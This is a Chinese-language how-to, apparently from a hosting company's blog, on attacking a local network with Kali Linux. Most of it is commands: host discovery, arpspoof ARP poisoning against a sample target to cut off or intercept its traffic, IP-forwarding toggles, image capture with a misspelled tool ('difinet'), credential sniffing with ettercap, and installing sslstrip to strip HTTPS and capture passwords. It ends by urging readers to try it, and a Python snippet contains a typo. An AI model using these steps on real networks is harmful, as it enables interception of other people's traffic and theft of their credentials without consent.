您好,登錄后才能下訂單哦!
本篇內容主要講解“kali局域網攻擊是什么意思”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“kali局域網攻擊是什么意思”吧!
路由指向
介紹兩個東西.
echo 0 >/proc/sys/net/ipv4/ip_forward #讓經過的數據不留通 echo 1 >/proc/sys/net/ipv4/ip_forward #讓數據流通
內網掃描
這個在百度上你可以看到很多相關的方式,比如nmap fping
但是基本上掃描結果不太號,在虛擬機上你會發現你把主機的防火墻關了都掃不到主機.
這里使用netdiscover
當然這里也寫幾個nmap之類的指令
nmap -PR -sL ip fping -asg ip netdiscover -i kali網卡 -r ip(網段) netdiscover -i eth0 -r 192.168.43.1/30
掃描速度是比較慢的
斷網攻擊
arpspoof -i kali的網卡 -t 目標地址 目標網卡 arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
開始欺騙讓數據經過你的電腦
2.echo 1 >/proc/sys/net/ipv4/ip_forward
放掉數據包
獲取圖片
使用工具difinet
difinet -i eth0(網卡)
實際操作:
圖片會在那里臨時保存
由于網絡問題可能會有點卡
使用ettercap
其他的操作還是一樣的,要開啟arp欺騙
ettercap -Tq -i eth0
-T 文本模式 q 安靜模式 i 網卡
然后等待即可.不過現在都是https,作用不大
出現中文怎么辦,直接賦值中文亂碼,之后解碼即可
百度搜索url解碼
或者直接使用python
中文編碼 from urllib.parse import quote,unquote str1 = '中國' str2=quote(strl) print(str2) 解碼 print(unquote(str2))
獲取HTTPS的密碼信息
這個要先修改以下ettercap的配置文件.
vim /etc/ettercap/etter.conf
使用工具 sslstrip
那個吐槽一下 kali 2020是沒有sslstrip的原因是沒有安裝python2的pip 只有pip3
記住一定要先安裝python2
在kali里面python 默認為python2 當然你可以用ln -s 修改一下.
apt install python 這個時候會自動安裝python 2.7
然后輸入以下指令安裝sslstrip
git clone https://github.com/moxie0/sslstrip.git cd sslstrip python setup.py install
這個是python2的,如果沒猜錯可能會遇到OpenSSL報錯說沒有這個模塊
pip install pyOpenSSL
到此,相信大家對“kali局域網攻擊是什么意思”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。